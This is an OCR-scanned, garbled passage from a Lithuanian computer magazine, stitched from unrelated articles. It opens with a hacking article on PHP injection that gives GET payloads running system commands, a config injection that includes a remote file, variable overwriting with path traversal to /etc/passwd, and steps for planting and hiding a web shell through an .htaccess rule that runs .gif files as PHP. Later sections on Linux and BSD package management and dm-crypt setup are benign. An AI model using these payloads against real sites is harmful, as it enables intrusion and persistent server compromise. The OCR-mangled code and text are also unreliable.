Tegu šiame eksperimente $mda ir $c bus nurodomi tiesiog per GET: 


script.php?c= (system(is))*623e*6008mda=system(Is) 


Taip mes gauname kataloge saugomų bylų sąrašą. Kodėl taip 
yra — pabandyk sugalvoti pats, apie visatai jau buvo rašoma šiame 
straipsnyje. 9423 — URL formatu užkoduotas ž simbolis. 


Bylų varikliukai 

Kai kurie nemokami hosteriai nesuteikia priėjimo prie MySOL. 
Tokiems atvejams rašomi varikliukai, veikiantys su tekstinėmis 
DB.Tekstinių DB struktūrair bendravimas su jomis gali būti patys 
įvairiausi. Kartais tokie kūrėjai net sugalvoja darbo su tekstinė- 
mis DB funkcijų bibliotekas, kurios primena SOL kalbą. Tokiais 
atvejais tekstinė DB sudaryta iš katalogų ir bylų, kur, pavyzdžiui, 
katalogai — tai duomenų bazės, bylos — tai lentelės, o bylų 
viduje viskas kažkaip gudriai sudėliota bei saugoma lentelių 
struktūra, Mus domina kitas požiūris į tokias DB su tekstinėmis 
bylomis. Pavyzdžiui, kas gali būti paprasčiau, nei visus duome- 
nis sudėti į tam tikrą PHP bylą, prie kurios priėjimas iš išorės bus 
uždraustas, o po to ją prisijungti su include ir duomenų masy- 
vus iš karto gauti paruoštu pavidalu. Aptarsime exBB 1.9.1 pa- 
žeidžiamumą. Mums nesvarbu tai, kaip mes sugebėsime gauti 
priėjimą prie administravimo skydelio (tai daroma su kitais sis- 
temos pažeidžiamumais, o ne būtinai su PHP-injection), tačiau 
svarbiausia, kad tokia galimybė yra. Užeikime į administravimo 
skydelį, į konfigūraciją. 

Dabar paieškokime, kur saugomi visi šie duomenys. Pasirodo, 
kad jie yra kaip tik tokioje su include prijungiamoje byloje (priėji- 
mas priejos uždraustas panaudojant .htaccess). Bylos fragmen- 
tas atrodo taip: 
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$exbb['boardurl'] = "http://exbb'"; 
$exbb['home path'] = '2:/home/exbb/www/'; 
$exbb['boardname'] = forumo pavadinimas'; 
$exbb['boarddesc'] = forumo aprašymas'; 
$exbb['announcements'] = 1; 

Sexbb[ topics per page'] = 15; 
$exbb['posts per page'] = 10; 

$exbb['ch files'] = 0777; 

Sexbb['ch dirs'] = 0777; 

Sexbb['ru nicks'] = 1; 

$exbb['reg simple'] = O; 

Sexbb[' default lang'] = 'english'; 

Sexbb[ default style'] = 'Original', 
$exbb['membergone ] = 15; 


Aš sugebėjau panaudoti kabutes tik su vienu iš šių parametrų. Tai 
$exbb['boardurl']. Finale gavau štai tokį kocą: 


$exbb['boardurl] = 'http://exbb .Ginclude( http://127.0.0.1/talakin.txt')." 


Jeigu kintamųjų reikšmės saugomos su dvigubomis kabutėmis, 
tai mums net nebūtina iš jų išeiti, ką reikėjo padaryti su „“. Visų 
pirma, mes galime išvesti bet kokį kintamąjį tiesiog įrašydami 
jo pavadinimą, o antra, galime įvykdyti bet kokią funkciją, taip 
pat ir visokius system bei jo analogus, panaudodami žemiau 
aprašytą metodą. 


Kas dar? 

Dar galima rasti bei panaudoti daugybę labai naudingų dalykų. Pra- 
dedam išeeilės: 

1. Galime panaudoti duomenų masyvą be išankstinio deklaravimo. 
Pavyzdžiui: 


tor($i=0;$i<10;$i++) 

i 
0$a[Si]=$5[$i]; 
// Kopijuojame 10 pirmųjų 
// masyvo $s elementų į $a, 
// kur $a nėra apibrėžiamas 


) 
for($i=0;$i<count($a):Si+ +) 


eval($y['.$a[$i].]= Si): 

// kažkoks kreivarankio 

// programuotojo iškrypimas 
) 


Čia turima omeny, kad $s — tai „saugus“ masyvas, t.y. jis kons- 
trukcijoje nekelia jokio pavojaus. Tačiau pažiūrėkime, kas bus, 
jeigu serveryje aktyvuota register globals opcija. Jeigu pasiųs- 
tume tokią GET užklausą; Attp:/host/script.php?a[10]= 1;system 
(Is');//, tuomet gautume katalogo bylų sąrašą, kuriame yra skrip- 
tas script.php. Taip nutinka todėl, kad 11-to masyvo elemento 
deklaravimas (masyvuose elementai skaičiuojami nuo nulinio) 
niekaip neprieštarauja skripte panaudotai logikai. Niekas ne- 
pretenduoja į 11-to masyvo elemento vietą, todėl mes gauna- 
me priėjimą prie neva jau apibrėžto masyvo. Norint atsikratyti 
tokios klaidos, reikia prieš tai masyvą deklaruoti: $a=array(). 
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Įsilaužimas 


—3> 


Perduodant masyvo elementą su GET/POST užklausomis arba 
per sausainukus raktas neįterpiamas į kabutes. Taip užklauso- 
je reikėtų rašyti array[nameindex], o ne array['nameindex']. Šią 
klaidą dažnai galima sutikti dirbant su modulinėmis bylomis, t.y. 
pasitikėdamas masyvo apibrėžimu kitame modulyje arba bran- 
duolyje, konkretus modulis yra pažeidžiamas, o kartais su ypa- 
tingu būdu suformuota ir tam moduliui pasiunčiama užklausa 
galima aktyvuoti nepageidautiną kreipinį į masyvo elementus. 
Tai dažnas atvejis, 0 šiaip jau varikliukai su moduliais, į kuriuos 
galimatiesiogiai kreiptis ir kurie tokio kreipinio atveju veikia įpras- 
tu režimu — labai gardus kąsnelis. 

2. Galima kaip nors sukelti pavojų jau apibrėžtiems kintamie- 
siems, kuriuos galima apibrėžti iš naujo. Aptarkime konkrečią 
vcard PHP injekcijos klaidą. 

Konfigūraciniai varikliuko duomenys apibrėžiami specialioje 
byloje-konfige, kuri su include prijungiama prie kiekvienos sa- 
varankiškos PHP bylos pačioje jos pradžioje (tai byla, į kurią po 
to galimas tiesioginis vartotojo kreipimasis). Visi konfigūraciniai 
duomenys —tai asociatyvinio masyvo $cfg elementai. Potoeina 
kodas, kuris visus per GET perduotus parametrus pakeičia į to 
paties pavadinimo kintamuosius skripto viduje: 


it (Iempty($ GET)) 

i 

toreach ($ GET as Simp varname => $tmp value) 
i 

S$tmp varname = Simp value; 

) 

] 


Atkreipk dėmesį, kad tai įvyksta po to, kai konfigūraciniai duome- 
nys jau buvo deklaruoti! Tai reiškia tik viena: mes maždaug tokio 
pavidalo užklausa galime iš naujo apibrėžti visus konfigūracinius 
duomenis: 


index.php?cig[hostname]=biricz atacig[dbuser]=bi007vmašcfg 
[dbname]=bi007vmatestaėcfg[skin]=myskinšcig[dbpass]=ivkxzd8 
cfg[lang]=../../../..J..J..J.Jetc/passwd 


Sutokiu pažeidžiamumu galima prijungti laisvai pasirinktas bylas, į ser- 
verį užkrauti savas bylas irt.t. Šį pažeidžiamumą aptiko ShankaR. 

3. Galima nesigilinti į skirtumą tarp „“" ir „“. Aukščiau aš paminėjau 
hakeriškoresursonulaužimą. Jis buvo įgyvendintas išnaudojant štai 
tokį skripto fragmentą: 


eval(“š$register poll vars[Si] = V" trim(SHTTP GET VARS|$register poll 
vars[$i]]) V") 


Čia vietoje $HTTP GET VARSĮSregister poll vars[$i]] buvo gali- 
ma įterpti parametrą id. Jeigu, pavyzdžiui, skripte būtų apibrėžtas 
kintamasis su DB slaptažodžiu, oto paties $$register poll vars[$i] 
reikšmė būtų išvedama kažkur stdout'e, mes galėtumėm į id per- 
duoti $dbpasswd (kintamasis su slaptažodžiu) eilutę ir taip gauti 
DB slaptažodį. 

Tačiau tai dar tik pusė bėdos. Esmė tame, jog kūrėjai pasirū- 
pino tuo, kad mes galėtume tiesiog adreso eilutėje iškviesti 
laisvai pasirinktą funkciją. Tai daroma taip: ($(function());, kur 
function() — kreipimasis į pasirinktą funkciją. Taigi jeigu tokiam 
skriptui perduotume eilutę (Sfsystem([CO MMAND ]))), mes 
gautume web shellą. 
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Vietoje include funkcijos skripte gali būti vartojama include once, 
reguire, reguire once, kurios taip pat gali būti panaudotos 
eksploatuojant aprašytus pažeidžiamumus. 


PHP-injection 2 web-shell 

Kadangi svetainėse aptiktos klaidos paprastai ilgai negyvuoja, 
todėl pažeidžiamumą palikti web shello pavidalu ne tik nepatogu, 
bet ir nepatikima, Čia aš papasakosiu, kaip mes galime į svetainę 
perkelti web shellą ir nuošaliai jį paslėpti. Visų pirma mes turime 
turėti katalogą, į kurį galima rašyti. Norint gauti bylų bei katalogų 
sąrašą su teisėmis, pasinaudok komanda /s -Rla. Windows atveju 
naudokis dir/0. 

Jeigu priėjimas prie cmd iš skripto uždraustas, tu gali susirasti arba 
susikurti tokį skriptą, kuris rekursyviai išveda visus katalogus ir by- 
las. PHP injekcijos atveju prisijunk jį su include( http:/some. server. 
com/script.php'). 

Dabar, kai mes su tavimi suradome katalogą, į kurį galima rašyti, 
reikia jį perkelti patį skriptą. 

Norint sužinoti, koks siuntimo įrankis prieinamas serveryje, įvykdyk 
šią komandą: 


which get;which wget;which lynx;which curl;which fetch;which links 


Vietoje atsakymo tau bus išvesti keliai iki atitinkamų įrankių. Kie- 
kvienu iš jų naudotis labai paprasta. Dabar mums reikia paslėpti 
mūsų skriptą, kad skyles užlopęs adminas jo nepastebėtų. Tam 
shellui reikia sugalvoti į akis nekrentantį pavadinimą. Tačiau jei- 
gu jis tūno avatarams skirtame kataloge, gali jį pervadinti kaip 
tik nori, vis tiek byla su PHP praplėtimu tarp gif'ų ir įpeg'ų atro- 
dys kaip balta varna. Bet mes į katalogą taip pat galime įkelti 
„htaccess konfigą ir jame nurodyti, kad bylos su praplėtimu gif 
būtų interpretuojamos kaip PHP skriptai. Eilutę „AddType ap- 
plication/x-httpd-php gif“ į htaccess galima įrašyti su cmd ir 
echo arba su paprasčiausiu skriptu. Jeigu tu esi susipažinęs su 
PHP tuomet žinai, kad kai serveryje aktyvuotas safe mode, mes 
negalime naudotis sisteminių komandų ir vykdymo funkcijomis. 
Laimė, safe mode — tai PHP direktyva, todėl jeigu tau pavyks 
surasti PHP injekciją, bus galima pasidarbuoti su Perl'u, kuriam 
safe mode apribojimai niekaip neveiks. Internete tu taip pat gali 
rasti tokių skriptų. 


Papildant aukščiau išsakyta 

Nepamiršk, kad parametrai skriptui gali būti perduoti 
keturiais būdais: GET, POST, COOKIE, SESSION. Pirmuosius 
tris vartotojas formuoja pats. Sesijos informacija saugoma 
serveryje, vartotojas jos modifikuoti negali, o sausainukus tu 
gali drąsiai keisti. 

Grožybė čia tame, kad daugelis web programuotojų į sausai- 
nukus kažkodėl žiūri kaip į tokį dalyką, kurį tikrinti reikia ne taip 
griežtai, kaip POST ir GET (čia vyrauja toks mąstymas, kad pas- 
taruosius du galima keisti tiesiog naršyklės adreso eilutėje arba 
svetainėje pateiktoje formoje, o sausainuką „velniai žino kaip pa- 
dirbsi"), todėl pažeidžiamumus labai dažnai galima sutikti būtent 
persausainukus perduodamuose parametruose. Tai gali būti tiek 
XSS, SOL-injection, tiek ir PHP-injection. Aš rekomenduočiau 
PHP-injection pažeidžiamumų paieškai susikurti programą, kuri 
skenuotų visas varikliuko bylas ir jose ieškotų visokių įtartinų da- 
lykų, pavyzdžiui, to, kas aprašyta šiame straipsnyje, t.y. visų eval, 
reguliariąsias išraiškas su „e“ modifikatoriumi, jau nė nekalbant 
apie include ir reguire. Po to tokia medžiaga analizuojama gana 
greitai ir paprastai. Šia linksma gaida aš pasitraukiu į užkulisius. 
Otu nė negalvok visų šių dalykėlių įgyvendinti praktiškai: įstaty- 
mas nesnaudžia! 
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PAKETŲ VALDYMO SISTEMA KARTU SU INICIALIZACINIŲ SKRIPTŲ ORGANIZAVIMO PRIN- 
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BŪTENT PROGRAMINĖS ĮRANGOS RINKINĮ ŠIANDIEN PRI- 
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Tais laikais, kai Pingvinas dar buvo mažas 
nebuvo nei paketų, nei distributyvų. Entuzi- 
astai, nusprendę išbandyti Linux, iš interneto 
parsisiųsdavo branduolį ir visą operacinės 
sistemos užkrovimui ir veikimui reikalingą 
programinę įrangą, opotovalandyvalandas 
sėdėdavo priešais monitorių, bandydami 
visa tai surinkti į vieną visumą, kad taip gauti 
kažką šiek tiek primenančio šiuolaikinį LFS. 
Akivaizdu, kad toks požiūris į Linux įdiegimą 
tenkindavo nebent fanatikus, kurie nuo ne- 
padorių santykių su OS patirdavo tikrą ma 
lonumą. O kitiems dury: duklingą Linux 
pasaulį buvo užrakintos didele pakabinama 
suomių gamybos spyna 
Pirmaisiais heroj kurie ryžosi Pingvina 
parodyti plačiosios visuomer sluoks- 
niams, tapo Piteris Makdonaldas ir Patrika 
Volkerdingas. Apie tai, kaip Makdonaldas 
92-aisiais metais sukūrė pirmąjį istorijoje 
Linux distributyvą, galima pasakoti ilgai 
tačiau ši tema mūsų dabar nedomina. Mus 
labiausiai domina gerai žinomo Patriko kū- 
rinys, pavadintas Slackware Linux. Būtent 
Patrikas Linux pasauliui pasiūlė paketų 
valdymo idėją ir įgyvendino ją specialių 
savo distributyvui skirtų įrankių pavidalu 
Pats paketas buvo paprase ausias archy- 
(tarball), kurį allpkg galėjai 
įdiegti į failų sistemą. Atvirkštinį veiksmą 
atlikdavo komanda /sbin/removepką, kuri 
davo Avar/k s/ bazę 
ir pašalindavo paketą iš sistemos. Nuo tų 


vas 


peržiū! 
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laikų Slackware distributyvo paketų valdy- 
mo sistema kardinaliai nepasikeitė (kaip. 
beje, ir visa kita), pasikeitė nebent tai, kad 
neatsiejama kiekvieno paketo dalimi tapo 
bylos install/doinst.sh (po paketo įdiegimo 
vykdomas skriptas) ir install/slack-desc 
(trumpas paketo aprašymas), o pagrindinė 
distributyvo komplektacija pasipildė dar 
keliais naudingais įrankiais, pavyzdžiui 
'sbin/pkgtool (pseudografinis /nstallpką ir 
removepką front-end'as) 
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Kuriame paketą su checkinstal! 


UDONKEPUF 1 
Nepadoriai paprastas Slackware ir jo požiū. 
risįpaketyvaldyme traukia patyrusius 
vartotojus, kurie gali savarankiškai išs 
priklausomybių ir konfliktų tarp pakei 
blemas. Te ka darytivisiems kitiems, ne 
taip artimiems Linux žmonėms? Šiuo klau- 
sIMU UžsIeMeė vienos Iš pirmųjų komercinių 
Linux kompanijų — Red Hat — vadovybė 

Tinkamų sprendimų „protingam 
valdymui metu nebuvo, todėl Red Hat 
programuotojai sukūrė 
formatą — Ped Hat Package Managerarba 
tiesiog RPM (šiandien ši santrumpa varto- 
jama kaip RPM Package Manager). Kitą 
šiandien populiarų paketų formatą pasiūlė 
Janas Mardokas, Debian kū s. Siandien 
Debian paketai pavirto savotiška RPM prie: 
šingybe, o išėjus Ubuntu Linux jų pozicija 
dar labiau sutvirtėjo 

Abu formatai turi panašius bruožus: PGP 
parašus paketo kūrėjo identifikavimui, 
visų paketo bylų kontrolines sumas, pri 

klausomybių ir konfliktų stebėjimą, vir 
tualių paketų sampratą. Skirtumai taptų 
akivaizdūs jeigu į paketą pažiūrėtume iš jį 
kuriančio žmogaus pozicijų. RPM pake 
formatas labai painus, nevienareikšm 
kas, sunkiai plečiamas ir nesuderinamas 
su ankstesnėmis versijomis (šiuolaikiniai 
RPM — tai jau ketvirtoji reinkarnacija) 
Kitavertus Debianpaketai—taiarchyvai 
kuriami su įrankiu /usr/bin/ar (archyvato- 
rius paprastai naudojamas objektinėms 
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nuosavą paketų 
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byloms supa- 
kuoti į statinę 
biblioteką) 
su dviem 
tarball'ais 
viename kurių 
yra progra 
ma (t.y. bylos, 
kurios turi būti 
įdiegtos į failų sis- 
temos medį), o ki- 
tame — metaduo- 
menys (paketo, 
priklausomybių ir 
kitų dalykų aprašy- 
mai). Tokiu atveju 
vidinė Debian pa- 
ketų struktūra gali 
būti lengvai pra- 
plėsta ir pritaikyta 
prie naujų sąlygų 
Įrankiai /usr/sbin/ 
rpm ir /usr/sbin/ 
dpkg, kurie yra 
standartinės 
Red Hat ir De- 
bian paketų 
manipuliavi- 
mopriemonės.iš 
tikrųjų neturi ypatingo „intelekto“. Pagrin- 
dinės jų užduotys — paketų įdiegimas, 
pašalinimas ir metaduomenų išgavimas. 
Vartotojui siūloma naudotis aukštesnio ly- 
gio priemonėmis, tokiomis, kaip apt-get 
(Debian), yum (Fedora Core), up2date 
(Red Hat) arba urpmi (Mandriva). Visos 
šios programos turi vieną tikslą — auto- 
matizuoti paketų įdiegimo ir atnaujinimo 
procesą (paketo ir jo priklausomybių 
parsiuntimas iš interneto, atskirų paketų 
ir viso distributyvo atnaujinimas) 
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SUMAN RANK 
Daugelio populiarių Linux distributyvų 
paketų bazėse yra po keliolika tūkstančių 
programų, kas visiškai patenkina 9996 var- 
totojų. Vis dėlto kartais prireikia kaip tik tos 
programos, kuri nepateikiama kartu su dis 
tributyvu. Galbūt paketas ir yra, tačiau norisi 
išbandyti naujosios, prieš penkiasvalandas 
išleistos versijos skanėstus. Ką daryti tokiu 
atveju? Pats paprasčiausias būdas — par- 
sisiųsti išeities tekstus ir savarankiškai su 
kompiliuoti programą, tačiau tuomet mes 
ateityje susidursime su paketo pašalinimo 
problema, kadangi paketų bazėje apie jį ne- 
bus informacijos. Savarankiškai kurti pake- 
tą? Taip, tai teisingiausias kelias, tačiau jis 
tuo pačiu yra ir sudėtingesnis bei reikalauja 
daugiau laiko. Ką tuomet daryti? Panaudoti 
specialius įrankius, kurie automatizuoja pa- 
keto sukūrimo procesą 
Checkinstall (checkinstall.izto.org) — Vie- 
nas tokių įrankių. Checkinstal! paleidžia- 
mas jau sukompiliuotos programos įdiegi- 
moetape (kaip tik tada, kai reikia panaudoti 
make install), kuomet jis perima bylų kopi- 
javimui naudojamus bibliotekinius iškvieti- 
mus ir sudaro įdiegiamų bylų sąrašą. Tada 
remiantis šia informacija sukuriamas pake- 
tas (tgz, rpm arba deb) ir įrašomas į bazę 
Programos įdiegimas iš išeities tekstų pa- 
naudojant checkinstall atrodo taip 


3URELI 


Kitokį požiūrį išpažįsta programos GNU 
Stow (www.gnu.org/software/stow/) kūrė- 
jai. Stow nekuria gimtojo (native) distributy- 
vo paketoir nenaudoja nuosavos duomenų 
bazės Šis įrankis vartotojui suteikia galimy- 
bę programą įdiegti į individualų katalogą 
(kaip kad tai vyksta Windows ir MacOS 
sistemose). Programų „išdrabstymas“ į 
izoliuotus katalogus prieštarauja Unix ideo- 
logijai, tačiau tai gali būti panaudota įdarbi- 
nus simbolines nuorodas. Prie tokio požiū- 
rio privalumų galima priskirti dalinį konfliktų 
tarp paketų problemos išsprendimą ir at- 
vaizdavimo pusę. Apžvelgsime programos 
įdiegimą panaudojant Stow 


Paskutinė komanda /usr/ocal medyje 
sukurs visas reikiamas nuorodas. Norint 
pašalinti programą, pakanka įvykdyti dvi 
komandas: „stow -D program“ (nuorodų 


DragonFlyBSD sistemos komanda pkg info 


pašalinimas) ir „rm -Rf /usr/local/stow/pro- 
gram“ (pačios programos pašalinimas) 
Egzistuoja daugybė kitų „teisingų“ progra- 
mų įdiegimo iš išeities tekstų būdų, su įdo 
mMiausiais kurių tu gali susipažinti LFS (www. 
linuxfromscratch.org) projekto svetainėje 


Užuot įkėlę paplitusią PĮ į kiekvienam dis- 
tributyvui atskirą pakelą, komercinės ir 
uždaros PĮ kūrėjai nusprendė panaudoti 
kažką panašaus į savaimT sipakuojančius 
archyvus. Be abejo, čia nė negali būti kal- 
bos apie kokį nors priklausomybių sekimą 
ar paketo registravimą bazėje, tačiau čia 
įvykdoma pagrindinė bet kokios IT srityje 
dirbančios kompanijos užduotis. Daugeliu 
atvejų šio savaime išsipakuojančio archy- 
vo praplėtimas yra .run — tai shell skriptas 
kurio pabaigoje yra archyvas su programa 
Paleidus skriptą vartotojui užduodama kele- 
tasklausimų, poto apskaičiuojamas taškas, 
kuriame pasibaigia tekstas ir prasideda ar- 
chyvas, jis perkeliamas į laikiną bylą ir išpa- 
kuojamas į vartotojo nurodytą katalogą. Po 
apdorojimo visos sukurtos bylos nukeliauja į 
/dev/null, ovartotojas galvoja, kadįvyko kaž 
kas stebuklingo. OpenOffice, Opera, nVidia 
tvarkyklės ir daugelis komercinių žaidimų 
platinama panašiuose savaime išsipakuo: 
jančiuose archyvuose 

Panašus požiūris naudojamas AutoPac- 
kage (www.autopackage.org) formato pa- 
ketuose. Be shell skripto ir archyvo su pro: 
grama tokiame pakete yra patogus grafinis 
instaliatorius, galintis sekti priklausomybes 
bei paketų valdymo įrankis, kuris įdiegia- 
mas į sistemą kartu su programa ir įrašo- 
mas į KDE ir Gnome meniu. AutoPackage 
paketų įdiegimo ir pašalinimo procesas ne- 
pasiruošusiam žmogui nesukelia jokių sun- 
kumų. Daugelis problemų išsprendžiama 
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automatiškai, blogiausiu atveju išvedama 
informacija apie klaidą ir jos išsprendimo 
būdai. Išoriškai visa tai labai primena pro- 
gramos įdiegimą Windows sistemoje. 


VELNIO PAKETUS 

Situacija siaurame BSD sistemų ratelyje, 
priešingai nei Linux pasaulyje, ne tokia 
patraukli. Čia nėra daugybės PĮ supa- 
kavimo variantų, skirtingų PĮ platinimo 
požiūrių ir įkyrios distributyvo kūrėjų nuo- 
monės. Bet kuri BSD šeimos OS siūlo dvi 
programinės įrangos įdiegimo priemo- 
nes: tai jungtys ir paketai. Beje, visose 
BSD šakose šios priemonės atliktos pa- 
našiai (o NetBSD ir DragonFlyBSD siste- 
mose jos iš viso vienodos) 

Paimkime, pavyzdžiui, jungtis. Jung- 
tys (ported applications) — tai tam tikra 
schema, skirta automatizuoti programų 
kompiliavimui iš išeities tekstų. Jungčių 
struktūra vienoda visose BSD sistemose 
bei remiasi vienais ir tais pačiais princi- 
pais: tai pagalklases surūšiuotas progra- 
mų medis, make bylų rinkinys programų 
parsiuntimui, išpakavimui, priklausomy- 
bių sekimui ir kompiliavimui. Taigi čia ski- 
riasi tik realizacija. Pademonstruosiu tai 
remdamasis pavyzdžiu. Norint NetBSD 
sistemoje sukompiliuoti ir įdiegti vim, rei- 
kia įvykdyti dvi komandas 


FreeBSD sistemoje viskas daroma taip pat 


Kaip matai, vartotojui skiriasi tik jungčių 
katalogo pavadinimas. Derėtų taip pat 
paminėti, kad NetBSD ir FreeBSD jungčių 
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sistemos palaikomos su visiškai nepriklau- 
somomis komandomis, tačiau jų giminystę 
pastebėti nesudėtinga. 

Esminio skirtumo nėra ir paketų valdymo 
įrankių realizacijoje. Bet kurioje BSD galima 
surasti įprastines komandas /usr/sbin/pkg 
add, /usr/sbin/pkg delete ir /usr/sbin/pkg | 
info, kurios yra atitinkamai skirtos paketams 
įdiegti, pašalinti ir informacijai apie paketą 
gauti. Paketo įdiegimo metu pkg add tikri- 
na, ar įdiegtos visos reikalingos priklauso- 
mybės (ir jeigu reikia, jas įdiegia), išpakuoja 
paketą į failų sistemos medį (/usr/local Fre- 
eBSD sistemoje) ir į /var/db/pkg/bazę įrašo 
informaciją apie paketą. FreeBSD, NetBSD 
ir OpenBSD paketai — tai įprastiniai su gzip 
(šiuo atveju praplėtimas yra .tgz) arba bzip2 
(.tbz) suspausti tarballai, tačiau jie skiriasi 
savo turiniu, Šiaip ar taip, tokio tarballo ša- 
knyje yra keletas bylų, kurių pavadinimai su- 
rašyti didžiosiomis raidėmis, ovietoje pirmo- 
jo bylos pavadinimo simbolio naudojamas 
„+“ ženklas. Tokiose bylose saugoma įvairi 
informacija apie paketą, jo turinį ir priklauso- 
mybes (pavyzdžiui, + COMMENT — trumpa 
informacija apie programą, + CONTENTS — 
diegiamų bylų sąrašas, +INSTALL — po 
įdiegimo paleidžiamas skriptas). 

Neseniai BSD gerbėjai sukūrė taip vadi- 
namą „stalinę BSD“. Mes tapome iš karto 
dviejų šios šeimos atstovų pasirodymo 
liudininkais: DesktopBSD (desktopbsd. 
net)ir PC-BSD (www.pcbsd.org). Be jokios 
abejonės, šiuose FreeBSD distributyvuo- 
se ypatingą vietą užima draugiška paketų 
valdymo sistema. DesktopBSD sistemoje 
draugiška tapo jungčių sistema — dabar 
programas iš išeities tekstų galima kom- 
piliuoti naudojant patogią grafinę sąsają. 
O PC-BSD priešingai, naudoja nuosavą 
paketų formatą. Paketus valdo PBI siste- 
ma, kurią idėjiškai galima pristatyti kaip 
anksčiau aptartų GNU Stow ir AutoPacka- 


ge simbiozę. Paketai įdiegiami su grafiniu 
įdiegikliu ir įkeliami į /usr/local/MyPrograms 
(kiekvienas atskirame kataloge) 

Jungčių sistemos lankstumo ir galios negalė- 
jonepastebėti Linux vartotojų bendruomenės 
atstovai. Danielis Robinsas įsigudrino į vieną 
apjungti Linux bendruomenės technologi- 
nius pasiekimus ir BSD pasaulio filosofiją, 
iš ko rezultate gavosi Gentoo — daugiau- 
siai BSD skonio turintis Linux distributyvas 
Gentoo sistemoje atsispindi ne tik idėjiškos 
(paprastumas, stabilumas), tačiau ir techni- 
nės BSD sistemų pusės, pavyzdžiui, jungčių 
sistema, kuri čia pavadinta portage. Beje, 
Gentoo kūrėjai nuėjo toliau už savo kolegas iš 
BSD stovyklos bei dar labiau patobulinoirtaip 
gražų P| įdiegimo požiūrį. Ryškiausiais skirtu- 
mais čia tapo komanda /usr/sbin/emerge ir 
taip vadinamos „USE vėliavėlės“. Su python 
parašytas emerge skriptas naudojamas pa- 
ketamsvaldyti ir savyje apjungia visas paketų 
valdymo funkcijas, ty. leidžia įdiegti ir paša- 
linti jungtis, audituoti jungčių medį. Naudojant 
emerge, galima lengvai įdieginėti binarinius 
paketus. Šiuo atveju jis veikia Debian apt-get 
komandos principu. Tai, kas Gentoo sistemo- 
je vadinama paslaptingu terminu „USE vėlia- 
vėlės“, iš tiesų yra ganėtinai įdomus būdas 
komandai emerge perduoti duomenis apie 
tai, kokios priklausomybės turi būti įjungtos 
į kompiliuojamą programą, o kokios — ne 
Pavyzdžiui, norint sukompiliuoti mplayer be 
X-Windowpalaikymo, tačiau tuo pačiu palikti 
video peržiūros konsolėje galimybę, reikia į 
bylą /etc/make.conf pridėti eilutę „USE=-X 
+fbcon“ ir įvykdyti komandą „emerge mpla- 
yer“. Norint laikinai įjungti/atjungti vėliavėles, 
galima panaudoti štai tokį metodą 


Gentoo " A emerge e2fsprogs 

Calculat ing dependencies „..done! 

>>> emerge (1 of 1) sys-fs/e2fsprogs-1.37-71 tO / 
1) 


ebulid 


>> mdS files e2tsprogs-1.37-r1.ebuild 

>5> mdS files e2fsprogs-1.37.ebuild 

>5> mdS files e2fsprogs-1.35-r1.ebui1d 

>>> mdS files e2fsprogs-1.36.ebui1d 

>>> mas filės files/digest-e2fsprogs-1.37-r1 

>>> mdS filės files/e2isprogs-1.36-makef L le. patch 
>>> mdS files files/digest-e2fsorogs-1.36-r2 

>> mdS files files/digest-e2isprogs-1.36 

>5> mdS tiles files/digest-e2fsprogs-1.35-r1 

>>> mdS files files/e2fsprogs-1.32-mk Cmds-Cosme1 
>> mdS files £11es/e2fsprogs-sed- locale.patch 
>>> mdS files files/e2fsprogs-1.36-sed-10cale pati 
>> mdS files files/digest-e2fsorogs-1.37 

>5> mdS files fi1es/e2fsprogs-1,37-e2p-test „patch 


>>> mdS srC.url :-) e2fsorogs-1.37.tar.42 
>>> Ungecking source. .. 
355 Unpacking e2fsprogs-: 


37.1ar.42 to /var/tmo/portage. 
BS 


+ Applying e2fsprogs-1.37-e2p-test „patch... 
>>> Source unpacked.. 

+ econf: updating e2fsorogs-1.37/conf Ig/conf ig.sub it! 
8506 
+ econf: updating e2fsprogs-1.37/Conf Ig/conf Ig.guess 
tis-guess 


emergeveikimas 
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+. 
Poreikis šifruoti duomenis egzistavo nuo senų laikų. Kai kurie 
bando savo duomenis apsaugoti nuo konkurentų, kai kurie žai- 
džia šnipus, kai kurie tiesiog yra hakeriai, kuriems rūpi galimos jų 
veiksmų pasekmės. Kiekvienam žmogui vienaip ar kitaip iškyla 
būtinybė išsaugoti savo duomenis. 
Tėratik du grėsmės tipai: duomenų paviešinimas ir jų pakeitimas. 
Duomenų paviešinimas reiškia tai, kad kažkas sužinojo saugo- 
mosinformacijos prasmę. Pasekmės gali būti pačios įvairiausios. 
Pavyzdžiui, jeigu pagrobtas knygos, prie kurios buvo dirbama 
mėnesių mėnesius, tekstas, tai autorių nuostoliai gali siekti de- 
šimtis tūkstančių dolerių, o jeigu knyga jau išleista, tai jos teksto 
pagrobimas knygątiesiog papildomai pareklamuos. Kitas klausi- 
mas — iškraipyta informacija, kas yra kur kas pavojingiau. Pavyz- 
džiui, jeigu bus sunaikinti organizacijos inventoriniai įrašai arba 
užsakymų sąrašai, tai darbas bus paralyžiuotas ilgam 
Linux sistemoje informaciją galima šifruoti keliais būdais: 
*šifruoti atskiras bylas (tai galima padaryti su GnuPG arbaopenss!); 
* šifruoti diskus (tai galima padaryti su Dm-crypt, kuris leidžia 
sukurti virtualų šifruotą diską, saugomą fizinėje byloje diske) 
Device-mapper — nauja Linux 2.6 branduolio infrastruktūra, 
leidžianti sukurti virtualius įrenginius, kurie veikia fiziniuose įren- 
giniuose. Dm-crypt nuo Cryptoloop skiriasi grynesniu kodu ir 
patogesne konfigūracija. Aš aptarsiu Dm-tools galimybę Debian 
ir Gentoo sistemose. Likusiems distributyvams konfigūravimo 
procedūros bus analogiškos. 


Dm-crypt įdiegimas 
Iš pradžių būtina pakeisti branduolio konfigūraciją, ką gali pada- 
ryti paleisdamas grafinę jo konfigūravimo aplinką: 


*cd/usr/src/linux 
+ make menuconfig 


Būtinos branduolio opcijos: 

1. Prijungiame opcijas, kurių būsena yra „kuriamos“ arba „eks- 

perimentinės": Code maturity level options -> Prompt for develo- 

pment and/or incomplete code/drivers 

2.Pastarojiopcijareikalinga korektiškam darbui su udev: General 

setup -> Support for hot-pluggable devices 

3. Paties Device-mapper galimybė: Device Drivers -> Multi-de- 

vice support (RAID and LVM) -> Device mapper support. 

4. Šilravimo per Device-mapper galimybė: Device Drivers -> 

Multi-device support (RAID and LVM) -> Crypt target support. 

5. AES šifravimo algoritmo galimybė: Cryptographic options -> 

AES cipher algorithms. 

6.SHA1 šifravimo algoritmo galimybė: Cryptographic options -> 

SHA1 digest algorithm. 

7.Virtualių RAM diskų galimybė: Device Drivers -> Block devices 

—> RAM disk support 

8. Taip vadinamo pradinio RAM disko galimybė: Device Drivers 
> Block devices -> RAM disk support -> Initial RAM disk (initrd) 

support. 

Dabar branduolį kompiliuojame ir įdiegiame į /boot: 


Amount /boot 
* make 
+ make modules install install 


